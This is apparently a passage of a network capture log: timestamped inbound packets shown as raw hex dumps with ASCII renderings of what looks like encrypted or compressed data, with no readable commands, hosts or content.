2023-08-10 17:13:01 UTC	57	IN	Data Raw: 14 89 12 84 7c 7d 97 e7 66 7f 87 df 09 64 35 d9 0c 03 6c 5e 3f 0f 17 c9 cb 86 e7 b9 e3 c3 f9 79 05 f5 17 61 4b 4f 98 96 74 30 c0 b4 ef 78 a7 6d b3 23 e8 e4 4c 68 b4 a9 fe cf 6b 55 13 da e6 e0 b2 fd 41 5f e5 54 d6 e7 99 d8 2e de 55 b6 c2 94 e9 67 c3 67 ec 34 a9 26 e8 2e ca b8 5e ff c7 70 4b c8 ef ee 01 6c b5 ab 38 7c e4 1b 05 bf 06 7f 38 29 48 ab b1 db 36 b1 bf d3 6e 64 d0 3e 3d aa b0 11 69 05 cf c5 c3 a8 36 39 0b 66 50 9d f6 2f 32 81 ba e8 66 7d 40 c4 44 32 d6 a0 a0 52 ce da 02 12 30 cd 63 05 e2 66 50 7d c6 22 b5 48 eb 60 a1 a2 65 a4 29 c0 59 9c 13 a3 df 55 39 bb 89 dc f2 ba 27 b8 52 84 ec 61 4f 0e 5f ac a5 e1 66 57 b7 d5 ad 7d 93 b9 c5 bf ec e1 0e f3 eb bc 95 7c 24 e7 f8 7a e4 e0 c5 b0 0c f5 fd 79 3b 4f 6e cb 5a e2 54 6e ee e1 fa a3 76 92 82 31 51 eb 07 Data Ascii: \|}fd5l^?yaKOt0xm#LhkUA_T.Ugg4&.^pKl8\|8)H6nd>=i69fP/2f}@D2R0cfP}"H`e)YU9'RaO_fW}\|$zy;OnZTnv1Q
2023-08-10 17:13:01 UTC	58	IN	Data Raw: 9a 19 e6 83 2e cf dc 9d a5 f0 0e 80 27 2c 21 1a 56 c1 d4 71 d4 5b c2 fe da 88 b3 38 30 4c 6f 7d 27 0b 6a 0b 0c a9 13 e4 33 cf 96 b7 88 98 f5 bc 59 73 b7 01 6f 45 06 e2 da 5f dc d0 1a ea 3c ed d8 30 39 71 49 e0 47 66 71 16 7e 04 60 b0 fa e8 1e 23 35 6d bb e7 b6 31 c9 f5 da 53 87 5b 18 b9 54 4e ce 76 98 8b d9 20 21 5d e6 50 48 e9 21 3d 56 68 d2 db 5b e4 10 d1 d9 f3 b3 cf d6 78 78 cb 52 cb a0 36 05 46 08 32 0d ad cb 5a 33 99 ef 4b 64 16 ab 15 46 83 de 71 d7 e6 d4 54 ad d5 0f 57 85 07 34 f7 46 db 1b 2c 70 c1 65 3d a6 36 96 7b 11 b4 79 84 49 7a e3 09 62 cb cc c6 74 cd f4 cd d9 82 08 0a d6 1a 57 96 46 e6 d3 71 46 c4 de c7 fc 22 7e 07 c8 69 fa ab 71 9a 16 f0 dc d0 e0 b9 76 10 79 ae a1 bb ca c4 95 6d 93 6f a1 b4 b9 95 a7 bd f0 1f 0d e2 31 53 ca 98 f0 e2 4c 7b 98 Data Ascii: .',!Vq[80Lo}'j3YsoE_<09qIGfq~`#5m1S[TNv !]PH!=Vh[xxR6F2Z3KdFqTW4F,pe=6{yIzbtWFqF"~iqvymo1SL{
2023-08-10 17:13:01 UTC	59	IN	Data Raw: a8 8e cd 97 5a 46 e4 a1 6f 9b 4a bf d7 65 f4 7d bf 0e 61 3d 0a 4b f8 66 02 2f 1d 1e 44 e8 f5 ad 5a 98 3b 21 4f ca 46 ff 2e 77 b8 8a 59 75 61 81 da 45 16 67 07 ef c9 65 22 60 90 b6 e1 ee df 72 7c da 25 98 33 74 06 b2 c5 f6 ea 9b 5e c7 09 ff 56 e7 3d b4 3b 98 05 df db d8 fd 29 96 ca 04 00 95 a1 dc 7e ac 34 04 74 68 62 d4 12 7e f6 2a 47 1f a2 e2 fb 3e a7 46 58 f6 93 6a 48 73 a2 fe 49 62 0f 4d a8 ed f6 23 fd 74 3a b2 b2 0a c4 a8 a0 8f 9b 33 cc 66 f3 89 6b a9 ae 6f f6 28 40 4f b5 94 e9 b2 5d 67 ef 5c 29 22 c6 e1 1b 52 b3 9d 55 02 66 cb 12 dd 82 07 3d 67 2f fd 27 57 43 a3 bb 54 d4 f4 03 7d d5 0a 5f 83 f2 4d 23 85 57 4e 94 ae 75 09 22 91 8c 59 fd d2 c2 3c 8c 06 14 e8 8b 23 5e fd 15 09 71 15 c5 ac aa 95 29 6b 37 f8 70 13 f5 74 c4 f7 73 34 74 94 a5 8d af 6f 63 3c Data Ascii: ZFoJe}a=Kf/DZ;!OF.wYuaEge"`r\|%3t^V=;)~4thb~*G>FXjHsIbM#t:3fko(@O]g\)"RUf=g/'WCT}_M#WNu"Y<#^q)k7pts4toc<
2023-08-10 17:13:01 UTC	61	IN	Data Raw: 8a 9e 03 11 d3 4a d1 60 c1 67 60 75 70 39 17 08 e2 bc fe fb 5a 2d 73 36 1d 99 ba 8e 1d 7b 5a c8 d1 b5 9a 7b 06 d3 51 ad 25 08 51 70 dd 25 08 36 13 16 75 f2 0b e8 82 a9 2e cf fc 10 b2 65 4a 6b ee b0 e7 e4 27 f0 8d 01 ac 34 83 4a 13 17 a4 4b df c3 8a 83 cb 63 3a ec 31 f6 cf c9 a6 52 4f e5 3f a4 3e 6b 9a b9 5e ba 43 5d 82 ad 10 e3 0e ef 26 3d e3 69 f3 f9 9d cc d7 69 a8 38 73 51 81 73 1d 79 50 c3 c2 c7 c0 9a d6 c9 28 12 8d be d2 b5 1a 27 86 2a 84 17 69 93 c8 73 da de a3 e1 42 46 b0 72 25 f1 c1 0c e7 0e 4f 71 bc ca 2d 61 9b 27 fa f6 8a ed 7f 54 ab 97 0b f9 06 18 53 4c 56 ff 4e 0d 9b a2 fc 5b 36 05 25 63 0c e1 7e 99 75 58 70 a9 a3 18 16 f8 39 72 f4 08 7b 8a a1 33 f5 9f ae de 09 33 e0 74 38 0b 26 cf 5a ef bf ec 26 a5 e0 69 ef dd 7f 2a 73 11 b9 f7 59 66 64 4f d8 Data Ascii: J`g`up9Z-s6{Z{Q%Qp%6u.eJk'4JKc:1RO?>k^C]&=ii8sQsyP('isBFr%Oq-a'TSLVN[6%c~uXp9r{33t8&Z&isYfdO
2023-08-10 17:13:01 UTC	62	IN	Data Raw: a5 97 b6 4b 22 23 23 b1 1d 6e e9 7a 32 a1 e6 3b b4 fb 90 cc fb 25 8a 66 9d d0 f6 01 1e 6f a6 66 97 3e db ba 60 95 d7 8a f9 bb 3c 25 7e 40 9f ce 34 35 75 5f 1a 00 2c 3d f1 e0 47 a7 38 45 97 f4 10 96 17 46 6e ef 98 8b e3 43 51 5f d0 cf 3a 70 be 55 40 bc 29 97 8e 40 9b 2d 32 ef 12 ef b7 b5 ce ef 16 f6 87 a1 5b 84 03 a3 cf 19 c2 00 9e a7 dd 80 ba 94 10 36 14 74 c0 8a b7 15 79 bf 16 71 b4 7f 52 5b 0d c0 52 60 70 79 f5 16 5e 98 91 3a 70 8f 8f fa 64 e9 18 a5 de e2 93 93 cc f6 97 7f ff eb d6 1a ff b1 2f c9 13 4f 5c 94 41 fe f8 05 15 b9 86 2a 79 b2 fd fe ab 8d 49 88 74 0e 1d 70 77 cc ff 4c f6 38 c6 dd 9a cd e3 db 88 bf 70 d9 f9 ca 64 17 94 e1 3e 3a 28 72 98 c3 d7 1a ba 24 0e ea 47 db 4b 79 30 1e a2 2d f9 cb 99 4c 12 da 3a ba cb 7e 8a 57 92 8e bc de af ef 91 38 8c Data Ascii: K"##nz2;%fof>`<%~@45u_,=G8EFnCQ_:pU@)@-2[6tyqR[R`py^:pd/O\A*yItpwL8pd>:(r$GKy0-L:~W8
2023-08-10 17:13:01 UTC	63	IN	Data Raw: 2f c5 90 ae 67 d3 17 6b 6e ee ed 14 b1 eb e3 5f 81 0b 15 bb de a2 34 91 33 7b dc 11 8e 67 78 07 42 60 1b 72 e1 ce 1b 97 b2 33 0c ee 2a ea d8 63 d9 73 50 70 2b 2e d3 77 39 79 fb 34 c9 8f af 10 24 d2 d4 4c 19 3f d6 7c 6b c2 df 04 29 5f db bf 43 aa 4a f2 66 0f 86 bc ac 7e fd 5c b8 1b 98 a2 e8 4c 5d 88 e0 fa 5e 0a 8e 61 ca 55 4b 5b ab 01 42 34 dc 5e b6 bb 4b 81 da 78 2c d3 1a 98 90 c4 03 12 61 50 88 cc 9e f1 76 d8 b9 84 51 e4 eb 13 e3 1e 62 fc e9 ce 31 9e 25 c9 7a c8 ce ff 2e 81 80 2e e6 23 f4 7f 0a 7e 33 a8 cd 66 96 cd 3d 9c 8a 14 48 bb 3e 9f 7b 76 46 87 bf 35 51 0c 1c 41 79 9b f2 2c 1c 13 ec e4 e7 24 f6 aa 12 2a b6 cf cb c7 b1 6c a2 f0 b2 3d 23 4c 39 cb d4 58 93 e7 2a ed f4 30 41 b7 80 c4 bd a5 58 96 97 34 b2 f7 bc fc f2 a0 77 a9 b1 63 09 f6 b0 89 cb 93 22 Data Ascii: /gkn_43{gxB`r3csPp+.w9y4$L?\|k)_CJf~\L]^aUK[B4^Kx,aPvQb1%z..#~3f=H>{vF5QAy,$l=#L9X*0AX4wc"
2023-08-10 17:13:01 UTC	64	IN	Data Raw: ca cf 97 d6 85 84 9c 4b ce 97 11 63 dd fd 21 eb 0e 33 cc ed 71 53 19 aa 73 92 04 3e 43 30 2c d0 ec 0d 98 c4 8a b8 f3 8a 88 e2 db 0d 86 7a 3f f2 50 b1 c1 a3 a6 98 f2 73 70 dd 8d e2 c8 9c 86 32 06 f3 c2 44 27 e5 5e 94 7c 5a 89 d8 6f 1f c6 0b 44 50 35 48 99 02 d1 f6 ae 46 5a 64 7d a0 2c 95 e5 c7 21 80 98 4e e4 4e 10 36 e7 48 58 87 9b 21 e6 79 16 bc e7 80 0f ce 3e 1f 75 be d5 92 71 66 8f cf 79 81 0f db 76 ca f2 65 d2 b3 5c 86 27 fe 60 2b d4 58 d3 b5 7a 3b 99 18 03 c4 4b 52 35 5e 2d c1 d9 2d 3e 7d e6 b2 28 d9 62 05 91 d7 49 bf 7f d4 a2 b3 c7 48 97 ff bf e4 55 c5 ec 56 61 6c e9 45 a2 22 eb d2 a9 05 c4 cb e7 ad a2 6a 7b fa e2 5c 38 cb 98 fb 9c 3c 14 5d a1 f3 73 4c 66 76 ee 23 d2 59 65 48 15 cc ec 88 4f 1c f8 c9 17 58 49 9d fc 37 08 d6 c7 41 c5 73 f0 a2 aa 42 db Data Ascii: Kc!3qSs>C0,z?Psp2D'^\|ZoDP5HFZd},!NN6HX!y>uqfyve\'`+Xz;KR5^-->}(bIHUValE"j{\8<]sLfv#YeHOXI7AsB
2023-08-10 17:13:01 UTC	65	IN	Data Raw: d5 79 b6 5c 3d 1a 6e 53 0e bc af 83 58 f2 5d fe 2b fb 4b 1a a8 1e 79 18 2f c5 49 cf 6d bb 29 2d b0 41 7a e9 ab 29 c6 64 59 f4 58 45 ff 2a ca 9b 4d 18 f4 72 78 ec fd 9d d5 94 e9 e0 d9 2a 9f d5 d0 c3 d4 19 d1 8f f9 70 15 ff b6 25 13 94 22 0f a1 6f d3 f1 62 ff cf da e4 bd c9 ae d4 f8 66 61 Data Ascii: y\=nSX]+Ky/Im)-Az)dYXEMrxp%"obfa
2023-08-10 17:13:01 UTC	66	IN	Data Raw: 47 f6 60 00 45 12 f4 ed 55 80 cc 68 88 a9 87 dc df f5 7a 3d 1a 58 a0 6f b5 70 9d e5 e0 f0 e2 e2 09 8f 12 5e 4a d2 71 b0 f1 14 29 a0 75 7a ed 7d 5e 49 06 90 33 38 41 94 ae a5 bb c5 a2 e0 f8 6f 07 20 25 ec 3e fc 9f 4a e7 f9 b3 bb d4 0d 58 e0 2b 90 02 52 d7 47 ea 1e b5 7a 68 ef 29 f6 65 2e 00 a0 e5 a3 88 bb ff bd e0 a4 de 80 b7 51 9c 2d 1e 42 68 1a bc ca d4 e7 fe c8 b8 99 21 a3 3a 60 db 52 c0 11 46 37 b0 c2 1c 94 10 68 b4 11 77 b2 cd ea 6c 9e b2 56 4b 80 27 68 60 a6 f4 60 70 b2 ba 82 25 6c d4 d0 cd 2b fb ff 39 2a 4d e9 b7 d9 82 30 65 e9 76 d3 d8 2c 53 4e 58 25 2f 66 31 d2 41 ed dc 48 44 fa 49 99 2c 2b f2 f8 05 9e a5 d7 dc 89 54 85 59 b7 72 89 47 17 6f b9 18 e2 fb 4a 66 41 25 a8 bf fc 22 65 46 d1 79 30 c3 c5 57 74 9d 6f c9 8d d7 ef 92 ea 47 38 0f 37 58 26 12 Data Ascii: G`EUhz=Xop^Jq)uz}^I38Ao %>JX+RGzh)e.Q-Bh!:`RF7hwlVK'h``p%l+9*M0ev,SNX%/f1AHDI,+TYrGoJfA%"eFy0WtoG87X&
2023-08-10 17:13:01 UTC	67	IN	Data Raw: 52 f4 3f c2 ae eb 28 f5 f2 29 0d 58 2f e9 e7 7c de 3e 30 c0 60 a6 27 00 68 3f b5 28 95 9c c1 86 1d 29 7b 2c 99 1c 96 6c b6 00 05 79 8c d5 72 0f a6 18 7e e6 f4 05 42 a7 cd 58 f6 bb e4 97 fa 33 4c 0d e7 1d bd 53 52 ab 68 02 47 3a 8f 4f 82 d6 2a cb ac a7 d0 27 6a d2 a4 a4 1c a4 6d 44 a5 aa ac cc 1e 32 e3 05 54 6e 5e 32 95 bc f6 4e 65 51 cf cb 80 6b 4c e2 a1 4c b5 25 cd a5 61 28 05 c3 0c ef 9a 58 c0 10 ba 09 d0 f6 5e e3 23 36 e2 57 80 30 5f ef 17 36 0e 58 60 d3 1c a0 31 4b 3d 23 82 c0 3d cb 47 fd 54 26 75 30 cd dd 72 41 72 21 a7 59 74 c0 d1 b8 f1 4a f4 30 cf a4 01 ba 23 34 bb 6e c9 c9 e8 53 a8 0c 47 ca ed 3b a1 e2 55 dc 9e 19 76 12 33 c4 c1 ef 41 0b a4 5d ec c0 95 c8 d0 45 3d 65 51 30 34 4c 21 f2 be 95 e2 05 39 63 94 8e 63 4f cc f9 15 d5 3b 9e 40 34 44 70 48 Data Ascii: R?()X/\|>0`'h?(){,lyr~BX3LSRhG:O*'jmD2Tn^2NeQkLL%a(X^#6W0_6X`1K=#=GT&u0rAr!YtJ0#4nSG;Uv3A]E=eQ04L!9ccO;@4DpH
2023-08-10 17:13:01 UTC	68	IN	Data Raw: 25 31 27 63 7d 9f a8 4b 9b 13 e9 01 b2 a7 c1 04 8b e7 83 ea c8 fe 8d 07 db 90 10 f0 ab 18 f1 df 5c a1 9c 15 cc 73 59 cc 00 a6 02 ce 4c 6f 46 8e 31 15 ea 6c 9d 21 13 54 1d 5d 3d ff 21 1f 51 db cc f0 df ff ff df b7 8e 4b 25 f1 1a 9a 5d 0c de 47 1a 25 2b 0a f7 94 a5 2a c2 4d 4c cb 10 e6 14 f3 6d 13 4f fe 7b 89 36 ca 5f 52 32 c6 a0 02 61 26 f9 3a cd 55 c6 09 52 78 b4 ab dd 4c 79 96 60 8f f3 b3 32 ad 36 bd a8 2d 53 76 7b 5e 9a 6d 36 b5 f0 62 c4 cf 69 91 b3 c7 0a bd 59 da 42 f4 ff a6 03 96 7d 04 ff db 94 f5 1d d3 e3 7f 2c 26 8e 07 72 c8 7e a4 3e d2 b4 2e 4f f6 96 d1 f3 c0 70 0c 9c 91 ab 06 4f cf d0 f2 68 df 69 0f 79 3c 62 4c 15 61 ac 24 5f 29 45 0a 2d 50 68 be d6 ff ae a9 c6 18 59 8b 87 1c 7b 44 f0 ca 25 74 f3 d0 8a fd 30 1b 40 3f 5c af cb ca 4e 58 c4 b3 f0 30 Data Ascii: %1'c}K\sYLoF1l!T]=!QK%]G%+*MLmO{6_R2a&:URxLy`26-Sv{^m6biYB},&r~>.OpOhiy<bLa$_)E-PhY{D%t0@?\NX0
2023-08-10 17:13:01 UTC	69	IN	Data Raw: f6 be e3 22 19 14 91 a9 2c 30 e5 66 88 f2 66 51 0a d1 03 98 5b 77 51 d5 1e b9 70 02 dd 6c b0 e5 1d 2f 2c 5b 86 b8 20 44 ea f9 2d c6 fb 4d f3 a4 04 da d3 db a4 81 27 6a 3c b4 2e 01 46 49 6a 3d bb c5 23 32 4f 3a 5f ee aa 72 8e f9 fd 9d e4 61 ac d4 b4 cb 5e 65 e3 1e 6e 1a d1 86 1c 3d 5c 67 b2 6e 62 fa 65 da b6 7d f4 8b 46 d2 df d2 61 35 a5 a8 d4 3c d0 61 47 fe 54 49 28 0f e6 3d c0 05 66 1d e9 01 1a fe 5c 78 ca aa c6 91 1f 38 b1 75 d9 20 6e 59 87 12 fe 07 04 34 18 eb 8f 92 15 61 56 ef 8a ed 98 6f 92 6b 93 6f da fb 26 a5 f0 ac 0e 8d d1 6b 14 bd 94 7a 7a d0 d6 a6 5c 30 59 a0 1a 26 4e d4 16 24 8d 5c 49 f4 14 d8 71 7e 17 cd 5e 37 93 1f 61 41 02 a0 6e 14 28 52 f3 42 e0 88 5d 98 1b 35 30 ba c7 9e ac da 4c 3a 8f 07 79 f3 14 a1 27 c3 d7 16 61 e6 cc 9d 16 e2 63 3a 09 Data Ascii: ",0ffQ[wQpl/,[ D-M'j<.FIj=#2O:_ra^en=\gnbe}Fa5<aGTI(=f\x8u nY4aVoko&kzz\0Y&N$\Iq~^7aAn(RB]50L:y'ac:
2023-08-10 17:13:01 UTC	70	IN	Data Raw: 1f 8e bd f7 87 8a 90 1a 20 1e 0b ba 26 84 e1 e4 8d 43 cd 2b 32 56 c0 1f 06 2c ca 8a a4 ef 5c 52 50 0b e6 43 9c 6a ab d0 89 cc ca ab ec bd 8e 8f 7b 9a 20 d0 b9 95 b6 c5 b1 83 a7 7d 7c df ec d2 63 a4 73 55 0a 5b 1f 6a 12 6e 58 b4 90 da dc bb 2d f4 72 d6 e6 91 99 45 51 6c 67 d9 52 bc 4d ed bf 17 8e 37 af a4 7f 22 7c b3 38 7e 54 db b3 80 3e 6a f0 21 6b 45 7b e2 b9 39 52 4a 24 d0 f1 8f 98 1f f4 7b bb dd d2 17 11 67 f5 d0 c4 09 2d 18 68 32 04 05 b7 c3 ff 39 98 b4 12 29 69 f5 c0 01 c7 1a 04 74 7e 02 81 81 08 96 18 34 b4 36 2e ad 4c b4 96 d2 62 a2 58 47 e7 69 ff ea 0f 79 f9 17 a5 b3 f2 5c a0 98 3a 99 ee 06 1d fb cb 1e 55 40 7a ea 7c 69 86 b3 c5 00 7c bb 79 ae 28 37 4c 77 a6 2d e5 29 99 5c 00 42 47 c6 53 74 a1 4c 4a d7 c0 f9 e8 60 66 48 83 55 c1 24 90 1c 39 0e d5 Data Ascii: &C+2V,\RPCj{ }\|csU[jnX-rEQlgRM7"\|8~T>j!kE{9RJ${g-h29)it~46.LbXGiy\:U@z\|i\|y(7Lw-)\BGStLJ`fHU$9
2023-08-10 17:13:01 UTC	72	IN	Data Raw: e8 0d 64 1b 5f 99 ca 85 75 c9 6f 84 9f 1c f3 ab 2f 14 b5 35 8b 76 d8 e7 2d 88 ff 61 86 02 f2 ce a1 98 57 c8 6e 04 95 e7 1c c4 ed cf b5 85 2e 08 d3 37 71 a7 1d 26 3b a9 37 1b f3 6f 50 3c 43 7a cb cb a2 05 ce a9 c6 76 ce 19 8e 7f 62 91 c4 59 cb 66 8b 58 dd a6 93 2d 28 34 e2 55 54 1c 1a e4 94 37 97 43 9e a0 67 e6 36 b7 47 f6 f2 65 80 4d 6c 7c 02 28 f3 3e 45 74 d8 9c 5e 77 b0 80 da 4a 04 3d 44 a1 97 bb 48 ac 6f 54 43 8b 4b 37 81 26 10 d3 9c 4c f1 e0 3c ca 67 18 24 c6 58 64 95 2e a5 1a 50 1e e7 aa 98 e8 0f 30 c4 89 bb f2 ad 1d b5 99 77 1f 1c c5 33 0f 79 4f bf 57 da e4 a2 da b2 8f 64 b6 b4 9d 35 da 0d 3c d7 3d 71 ae 01 11 ff 5f 5e 93 dd 39 f6 51 2e 48 46 f6 7d ee ca ca 0b 0e 2e f6 50 96 26 95 ed d9 be e1 1e 1c 65 15 67 9e c8 3e 08 f5 b2 90 5c b1 41 e6 4f ad b8 Data Ascii: d_uo/5v-aWn.7q&;7oP<CzvbYfX-(4UT7Cg6GeMl\|(>Et^wJ=DHoTCK7&L<g$Xd.P0w3yOWd5<=q_^9Q.HF}.P&eg>\AO
2023-08-10 17:13:01 UTC	73	IN	Data Raw: 7b e5 6c 29 f7 69 fb ad 52 27 57 bb 10 6c e4 35 e5 81 28 b2 4d 04 1b 95 e1 a3 d7 66 60 2b e3 38 80 ca 7a 5d 4f eb de ee 1a 32 fe 47 1e 8b 2e 92 6f b1 0a f3 8d 1b 23 0e fd 88 dd 43 9d 28 e6 a4 46 b5 23 0c 6f 0b 6b b5 04 d1 47 b4 20 c3 eb b3 10 cc cd 4d 99 63 bd 79 d0 cb 46 86 88 57 3b 27 ef b4 96 5b 59 0f ed ab d5 d9 15 4d 3e 7e 5d 8d bd 3a 95 76 3d 8e 21 50 85 ab 3f ac b3 a5 10 ea d4 07 af 78 ff 27 e4 6d e0 50 16 b2 fe 0f 1c 25 9f 83 78 f9 0e 5f a5 83 58 f2 37 bb b4 cf 21 6e 38 4f 37 08 44 79 95 d9 cf d8 1a e1 9b 16 07 23 5b 42 f6 2a dc 02 a7 ae cc 72 27 6c 39 67 22 f2 4c b8 43 62 da f9 fd a1 4b bf f8 65 0c 59 6e 1a 61 8b 8b a6 63 c1 65 20 b4 75 c6 02 8a 5c 3b e2 1e 4a a7 01 f6 2b c9 a0 56 48 70 f4 cb 2c ce 67 cb 70 d7 ce f2 6f 63 7a 37 bb 8b aa de 78 df Data Ascii: {l)iR'Wl5(Mf`+8z]O2G.o#C(F#okG McyFW;'[YM>~]:v=!P?x'mP%x_X7!n8O7Dy#[B*r'l9g"LCbKeYnace u\;J+VHp,gpocz7x
2023-08-10 17:13:01 UTC	74	IN	Data Raw: d9 c7 e2 e6 80 5e 08 02 04 71 cf 0f 0a a1 19 d8 cd c1 67 ce be 43 9e 6e 80 23 0d d3 15 56 25 e3 b4 4f 2b 62 0c 5e b1 73 e0 9a 7e 64 4e f6 fa 77 a1 c8 21 50 96 a4 45 6f 39 ae 87 a8 94 09 26 d7 1b ac f6 29 dc 74 2f 92 80 5b ee 8c 50 3b 43 17 06 c6 8a 25 85 fe 73 19 8f e7 69 64 e1 f2 f9 1f 3e 58 a6 d2 7b e3 9b 79 df 36 1c fa 4e fb 36 d0 2b a7 f1 cc e8 de 3c 83 de 3a 06 11 f6 92 6d ca 6d 6c 20 0b 78 18 f8 75 42 8e 4f b0 25 52 47 9f 7f 09 df 9b 4f 5a 44 b6 cb b3 ce 3a 26 bd e3 7a ca ab 1f 1d 5f e8 84 3c 26 d4 92 94 81 ca 35 d7 f6 2b 2b 30 06 85 8d c6 17 dc 4f c9 48 6f 79 37 ba 93 f6 60 42 27 26 c7 07 e7 e2 51 9b 88 6e f5 88 5b 29 ec d8 61 1b 46 d2 9b ca 95 9c 53 c7 9c 9f 44 5d 8a b6 f1 94 87 d4 47 b4 f3 a2 fb 75 dc 6d 69 15 b8 3d e4 aa 9e e9 ad f2 8b 69 0a 08 Data Ascii: ^qgCn#V%O+b^s~dNw!PEo9&)t/[P;C%sid>X{y6N6+<:mml xuBO%RGOZD:&z_<&5++0OHoy7`B'&Qn[)aFSD]Gumi=i
2023-08-10 17:13:01 UTC	75	IN	Data Raw: eb 64 c6 2b 45 44 1e 72 7a 93 86 38 ce a3 83 3e f3 49 66 4b 45 78 57 79 75 4a c7 e8 5c 35 14 0d f9 76 f8 85 e6 09 2e 12 6c a6 a7 03 92 cb 4d bc ef 95 e7 2f a5 ba aa b3 4d 96 ee 4a ad ec 48 96 c0 4a 01 4e 96 ec 75 ea 97 25 ad 10 20 69 6d 93 2c 9d 07 9f 7f 34 39 a1 74 37 62 d5 14 a6 8b c0 1d 56 94 7e d5 b7 de 4e 28 b7 af 05 29 03 e3 38 75 d5 1b 2f 2c 69 6d e3 82 bf 7c b7 95 51 2c 4f 32 11 84 66 91 eb b1 37 f3 fd ce 73 9e 2f 2b 30 6e f3 3c 03 fc 4f 15 4d f1 35 3a a4 78 b1 b9 2f 81 b9 07 24 cd 77 fa cc cf 67 06 2c c4 d5 aa 9c 6f da a7 e2 2d cb 5b ad f2 be c6 be f3 41 ec 34 e3 62 c4 f1 35 ad 93 0c 9e b5 11 ef 56 bc 03 12 e2 59 d1 91 45 6a fc 6b 6d 29 1b a6 67 54 b2 3e 7f 5c b2 c2 78 a5 ef 04 74 92 e6 9b 2b b3 df 61 88 f3 26 cc 31 fe e7 7e c8 e5 b4 ef a5 4b 98 Data Ascii: d+EDrz8>IfKExWyuJ\5v.lM/MJHJNu% im,49t7bV~N()8u/,im\|Q,O2f7s/+0n<OM5:x/$wg,o-[A4b5VYEjkm)gT>\xt+a&1~K
2023-08-10 17:13:01 UTC	77	IN	Data Raw: ac c5 3d 6d 75 b1 50 32 ff 22 23 c2 0d 20 8b 40 64 07 e2 09 bb 07 11 aa 77 25 d5 c7 c4 94 b3 09 1a 1c 8e cd e5 f9 0a 40 a3 25 1f d2 81 a7 13 f5 49 0f 26 da c2 7f df 23 57 f9 d3 f7 af d0 f4 c3 77 02 70 22 66 a2 4a 7f 7c 80 6d 8b 80 73 39 a1 11 72 84 3e 83 b4 48 82 d8 b8 96 3a 1b 02 47 47 19 f1 4c 3a 28 32 8c 68 2d 17 f7 38 6f 32 27 c6 f8 1a 16 6b 7d a0 0d d5 90 26 cb f4 39 da e8 18 8c 15 68 b3 4e 61 ae 81 7c 2b b1 59 26 b8 9f 99 e7 07 ab 1f 44 ad 53 68 e7 2b 43 e3 e4 e9 1b a4 c4 4d 16 09 35 ff 19 0b b4 ab 67 3e 45 ed a8 1f ed 35 18 dd 5b 7e 40 13 1e 79 63 b3 b1 18 8a e9 78 2d c1 8e a3 d5 99 d2 48 42 00 3a ae 4f 1b 82 e1 1f 58 4d 98 27 ef 8c 42 dd f2 09 44 e8 69 3e 33 16 d3 8a 34 58 00 3a 95 66 de f8 29 9c da 7f 42 73 51 52 6c 30 b2 e6 0d 5b 86 ae 4e ec 8e Data Ascii: =muP2"# @dw%@%I&#Wwp"fJ\|ms9r>H:GGL:(2h-8o2'k}&9hNa\|+Y&DSh+CM5g>E5[~@ycx-HB:OXM'BDi>34X:f)BsQRl0[N
2023-08-10 17:13:01 UTC	78	IN	Data Raw: 4d d7 0f 2e 25 21 c7 23 5c c4 9a 64 f8 14 c3 d3 81 5f 51 93 ea f2 df b0 67 40 06 f5 b9 cd 54 6c 95 27 5e ea 7a a2 50 73 7d 84 94 56 66 22 ac 7c d3 62 ab 89 bc ad dc 15 98 b5 46 da 22 c3 da 74 71 f7 71 26 04 73 31 97 f5 30 aa 14 9b 74 38 32 68 2f 1a c1 46 90 25 76 27 c2 f6 c5 65 26 4d 05 29 92 17 f6 e9 2b 12 e3 b3 66 2e de db 75 11 51 3c 7a f5 98 36 21 e8 38 5f d1 23 3c 81 12 41 c5 24 80 f4 29 5c 08 f8 a0 e4 4a 27 35 58 14 5c 92 67 0f 61 16 43 6a a7 71 39 16 85 1b e2 b0 a9 85 f2 87 31 c7 34 45 d1 41 be cd 2c b9 94 40 a0 91 8b 2d 05 42 a8 67 4e 46 9c 38 6c 29 a6 28 93 31 1d 2a 30 8a d5 71 8f cc f9 8b 0c a3 93 2f 0b d7 96 1b 78 2c d6 f1 e3 f5 af 7e d5 91 49 a4 a5 a1 1d 63 38 ec 92 d0 a5 9c 5b fa 71 d4 87 47 35 0e 4b 3c 6f e4 ad 9b 63 1b 8a 28 4e 1c 00 9b db Data Ascii: M.%!#\d_Qg@Tl'^zPs}Vf"\|bF"tqq&s10t82h/F%v'e&M)+f.uQ<z6!8_#<A$)\J'5X\gaCjq914EA,@-BgNF8l)(1*0q/x,~Ic8[qG5K<oc(N
2023-08-10 17:13:01 UTC	79	IN	Data Raw: 81 7c 47 39 28 94 a6 3e ae 06 89 d0 4d 33 15 13 ef ee ff f1 e9 03 6b c6 09 73 74 9b 6f 82 4c db 7e 93 61 9f 34 b4 67 13 b6 7f 90 f8 7c 66 2f d1 cc bf 61 40 5d d9 c7 db dd bc 7e 3e ee 91 ec b7 24 ba 4c 17 81 44 d3 12 e8 bb 6b ce e8 83 d4 01 c0 52 b9 c1 d5 12 64 87 be 51 ec c3 8e 87 41 72 f9 87 f8 c3 86 31 1d 67 bc 83 bf 02 3f 1b 3a 60 7a b7 c2 97 8a f4 cd e7 87 5e c6 bc f0 ae 58 06 5d 70 99 38 49 c6 ad b9 a2 2e dd 83 ea 1f f6 e1 99 ca 2f 86 fb e5 64 8a ef d5 fc f6 d1 99 f6 e5 7a b6 21 61 94 1d 00 1e dc 79 5a cf 33 c6 df 50 ee 4a e1 91 f5 33 ba 4a 77 66 c1 04 8a 73 80 26 0b b9 a0 a9 18 87 03 75 e1 9c 7f 9c d2 c6 7e c8 5a 09 bd 69 b4 60 0c 0d c9 bd fa 6b 20 4d 28 11 74 f2 1a fc 63 36 c8 31 b3 83 df 1c 61 40 4d c7 c9 4b 53 f3 39 3b 37 ee 36 ff 7a 13 26 b3 82 Data Ascii: \|G9(>M3kstoL~a4g\|f/a@]~>$LDkRdQAr1g?:`z^X]p8I./dz!ayZ3PJ3Jwfs&u~Zi`k M(tc61a@MKS9;76z&
